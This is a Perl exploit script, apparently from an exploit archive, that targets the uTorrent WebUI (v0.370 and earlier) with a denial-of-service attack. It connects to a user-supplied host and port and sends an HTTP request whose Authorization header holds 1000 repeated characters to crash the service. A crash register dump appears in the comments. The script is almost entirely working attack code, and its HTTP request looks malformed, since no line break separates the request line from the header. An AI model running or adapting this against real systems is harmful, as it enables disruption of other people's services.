#!/usr/bin/perl |
# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit |
# Date: 2010-04-01 |
# Author: zombiefx darkernet[at]gmail.com<http://gmail.com> |
# Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370 |
# Tested on: Windows XP SP3 |
#Code: |
# lame usage: ./UTweb.pl <IP> <PORT> |
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94 |
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62 |
# Good luck! corelanc0d3r |
|
use warnings; |
use strict; |
use IO:: Socket ; |
my $nonbase64 = "\x41" x 1000; # That was pointless |
my $sock = IO:: Socket ::INET->new(PeerAddr => $ARGV [0],PeerPort => $ARGV [1],Proto => 'tcp' ); |
print $sock "GET / HTTP/1.1" . |
"Authorization: Basic $nonbase64" ; |
0 条评论。